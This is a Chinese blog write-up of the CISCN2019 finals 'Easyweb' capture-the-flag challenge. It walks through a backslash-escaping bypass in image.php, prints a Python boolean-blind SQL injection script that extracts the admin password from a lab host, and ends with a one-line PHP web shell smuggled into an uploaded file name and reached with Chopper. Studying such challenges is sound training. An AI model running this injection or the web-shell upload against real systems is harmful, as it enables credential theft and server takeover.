【CISCN2019 总决赛 Day2 Web1】-Easy web

最新推荐文章于 2024-03-21 13:19:04 发布
最新推荐文章于 2024-03-21 13:19:04 发布
阅读量769 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xixihahawuwu/article/details/110276043
版权

在这里插入图片描述在这里插入图片描述
进入环境是一个登录界面在这里插入图片描述检查页面元素没有发现啥,我们把源码下载下来看看在这里插入图片描述先看config文件在这里插入图片描述
是一个数据库文件
数据库名为ciscnfinal
接着看function文件
我们可以看到有关登录界面的在这里插入图片描述在这里插入图片描述还有两个函数方法
看image文件在这里插入图片描述Get传递两个参数在这里插入图片描述
把一些字符替换成空在这里插入图片描述Addslashes()函数会把一些特殊的字符转义,比如单引号转为\’,\转为\在这里插入图片描述其他的看了下,没有什么信息就过掉了
我们看下upload文件在这里插入图片描述要求我们用户名必须为admin
这里我们可以获得用户名admin在这里插入图片描述在user文件中我们可以知道成功登陆后的界面信息和一些弹窗信息
重点部分其实就是我们的images文件中的内容
我们来他的核心代码在这里插入图片描述是没有任何绕过的
我们可以根据他的Addslashes()函数和replace()函数来构建sql语句进行注入
试想这是我们id=\0,则在addslashes后变为id=\0,随后将\0其清空,那么这是id=\,正好可以使单引号逃逸出来,变成:
r e s u l t = m y s q l i q u e r y ( result=mysqli_query( result=mysqliquery(con,“select * from images where id=’ ’ or path=’ {$path}’”);
可以看到现在id的值为’ or path=,所以path就可以进行盲注了
我们可以写一个脚本来把密码跑出来
而且我们刚刚分析源码的时候其实已经知道啦数据库名和表名
数据库名:ciscnfinal
表名:users,image
字段名:password,username
直接查询字段内容就行
脚本如下 :

import  requests
url = "http://577ef033-d362-4101-a177-e3bf762e42f2.node3.buuoj.cn/image.php?id=\\0&path="
payload = " or ascii(substr((select password from users),{},1))>{}%23"
result = ''
for i in range(1,100):
    high = 127
    low = 32
    mid = (low+high) // 2
    # print(mid)
    while(high>low):
        r = requests.get(url + payload.format(i,mid))
       # print(url + payload.format(i,mid))
        if 'JFIF' in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    result += chr(mid)
    print(result)

在这里插入图片描述拿到密码登录在这里插入图片描述在这里插入图片描述我们可以看到当前所处的位置为user.php
我们再去看下源码
并没有什么信息。
我们先测试一下
老习惯,直接上传带一句话的图片文件
在这里插入图片描述???
把我的文件名写入了一个日志文件里??
那我直接修改文件名为一句话不就行了
在这里插入图片描述
在这里插入图片描述
额。。在这里插入图片描述这儿有点蒙,查了下在这里插入图片描述修改后上传在这里插入图片描述成功写入
菜刀连接在这里插入图片描述在这里插入图片描述

一名无聊的网友
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
2021全国大学生测试总决赛web功能测试_QQ音乐功能测试需求文档.pdf
11-19
Web功能测试是对网页应用的功能性进行全面验证的过程,旨在确保用户能够流畅、无误地使用网站。QQ音乐作为一款流行的在线音乐平台,其功能测试涵盖了多种交互场景,包括但不限于播放控制、歌单管理、用户交互、内容...
ACM-ICPC世界总决赛试题解析(2004-2011)第1章
11-19
ACM-ICPC世界总决赛2004试题解析
[CISCN2019 总决赛 Day2 Web1]Easyweb ----不会编程的崽
最新发布
不会编程的崽的博客
03-21 673
sql注入 文件上传
[CISCN2019 总决赛 Day2 Web1]Easyweb1
Mrs_H的博客
10-22 497
一.前言 在之前的文章中我提到最近一直在做sql注入相关的东西,也在一直做sql注入有关的题目。但是,事实上很多赛题他们的考点并不单一,往往需要结合着其他的知识,才能够拿到想要的结果。下面这道题就是我刚才所说的典型,虽然考的不难,但是足够说明当前sql题目的走向了。 二.正文 我们首先打开环境看到如下页面。 emmm,一个花里胡哨的登陆界面。尝试输入了很多用户名和密码组合,但是都不对。那就去扫一下目录,发现该网站存在一个robots.txt 这个robots文件中的内容就是在提示我们,该网站含有备份文件
[CISCN2019 总决赛 Day2 Web1]Easyweb
qq_51684648的博客
03-23 4693
[CISCN2019 总决赛 Day2 Web1]Easyweb 1、打开页面,试了试,xml,sql注入都没试出来。 查看robots.txt文件,发现 再查看源码,发现了image.php,试一下 image.php.bak泄露 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id);
BUU CTF[CISCN2019 总决赛 Day2 Web1]Easyweb 1
weixin_46245411的博客
06-16 750
文章目录前言一、源码审计二、开始冻手1.伪造Cookie2.上传文件3.getshell总结 前言 没赶上2019CISCN比赛,只能在BUU看到前人大佬们的荣光~ 不是很清楚BUU附属的源码是不是与比赛题目所给的一样,如果一样的话,我看其他大佬的WP都有BOOL盲注的出现,但是我直接审计源码绕过了SQL注入了,所以很好奇是不是有什么差异~ 所以我仅说说我解BUU的过程 一、源码审计 个人审计用到的几个比较重要源码:upload.php、config.php、function.php、user.p..
NO.3-11 [CISCN2019 总决赛 Day2 Web1]Easyweb
nigo134的博客
08-07 179
. 知识点 备份文件泄露 SQL注入利用 php短标签 2.感悟 这到题,我就写到SQL注入的地方,成功绕过了单引号的限制用\0,但是没有往盲注上想。以为是任意文件下载。看完题解,知道了思路应该是bool盲注,语句成功的话,就让id = 1,回显正常,错误的话 id = 0,就什么都没有。 这是我没有想到的,气死我了,应该是可以想到了。 3.实践 3.1 image.php.bak 御剑扫描到robots.txt,打开提示有备份文件,最后找到这个文件,然后下载下来 3....
web2-base-prefinal
02-13
决赛11/07/2020 恩特雷加 La entrega delexemenes utilizando el mismo repositorio git donde fue clonado este proyecto 。 附加档案库(adjuntos),适用于本公司在地毯上的附加档案,例如: adjuntos_examen/ y ...
Assignment-3---HA130314:Web 2决赛
04-06
在“Web 2决赛”中,可能要求学生实现响应式设计,使网站能在不同设备(如手机、平板和桌面电脑)上呈现良好。这涉及到媒体查询(`@media`)和弹性布局(Flexbox)或网格布局(Grid)。 【最佳实践】 编写HTML时应...
基于WEB2.0构建的财富快车电子商务系统-决赛方案.doc
01-08
【基于WEB2.0构建的财富快车电子商务系统】 在当今数字化时代,电子商务已经成为商业活动的重要组成部分,而基于WEB2.0技术的电子商务系统更是近年来的热点。WEB2.0强调用户参与、互动与分享,这为电子商务带来了...
buuctf-[CISCN2019 总决赛 Day2 Web1]Easyweb
m0_62094846的博客
05-18 701
扫描目录 得到*.php.bak 尝试*表示的东西, index,flag之类的都没用 有image.php,顺便可以看到可能的注入点 下载下了备份文件 <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=addslashes($path); ...
[CISCN2019 总决赛 Day1 Web4]Laravel1
nigo134的博客
06-17 897
反序列化漏洞laravel pop链的挖掘显而易见的考察反序列化漏洞,并且告诉了备份source.tar.gz,直接下载下来开始找pop链。反序列化的触发点一般为__wakeup()或者__destruct(),更多的是destruct,先找destruct。使用phpstrom,Ctrl+Shift+R查找function __destruct:通过逐个分析找到一个可以文件包含的链, TagAwareAdapter类: 调用过程:__destruct() -> commit() -> invalidat
[安洵杯 2019]easy_web 1
weixin_44477223的博客
04-07 780
运用的知识点 base64加解密 md5碰撞 内容 解题 页面里没有什么东西,源码也没有提示。但是我们在URL里发现了不一样的东西?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=img执行的东西被base64加密了,解密一下 得到:MzUzNTM1MmU3MDZlNjc= 还是一个base64的加密,再解密: 3535352e706e67 楞了一会发现是16进制,解密: 555.png 他这个参数进行了hex→base64→base64三次加密。 到这里我就卡住了,想
[SUCTF 2019]EasyWeb 1
m0_62879498的博客
06-04 1327
进入环境,发现源码: 在这道题中有大量的过滤 首先是 要求传入的变量长度小于18 紧接着就是严苛的正则匹配,我们前面有见过 这里要采用 异或 或者 取反 绕过 由于禁用了 这里取反无法实现 这里放一篇师傅的抑或脚本: 构造payload: flag竟然·在phpinfo里面感觉前面的原代码都没啥用 上网看了师傅们的wp后发现 这只是一种取巧的方法,正常的思路因该是: 但是一片空白 上面还有代码没看,我们仔细研究下: 总结: 我们上传的文件后缀不能为 php 同时会检查文件头 不能含有 得到上传
2020-09-27
qq_41252520的博客
09-27 298
Web&&Pwn 前些天看到了山科大一位表哥的文章,提及了一些Web与Pwn结合的技术,非常符合我的理念,以此作为引子,开始探讨以下两道Web_Pwn题目。 0x0 2019ciscn web——滑稽云音乐 这道题目一看页面还是挺美观的,看得出来出题人用心了!翻看过后有用的页面就是注册登录和上传音乐了 注册页面如下: 如何源码泄露的部分就不说了,因为我是本地搭建的环境,当时比赛是什么流程我并不知道。直接进行代码审计吧。首先看一下注册页面的代码 ... if (isset($
[ciscn2019 总决赛 day2 web1]easyweb
03-16
很高兴为您提供答案。 ciscn2019 总决赛 day2 web1 easyweb 是一道Web安全题目,需要使用SQL注入技术来解决。 首先,我们需要在登录页面中输入用户名和密码。然后,我们可以通过在用户名和密码字段中输入一些SQL注入语句来尝试绕过验证。 例如,我们可以在用户名字段中输入: admin' or 1=1# 这将导致SQL查询返回所有用户的信息,因为1=1始终为真。 然后,我们可以在密码字段中输入任何值,因为它不会被使用。 这样,我们就可以成功登录并获得flag。 希望这可以帮助您解决这道题目。如果您有任何其他问题,请随时问我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一名无聊的网友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值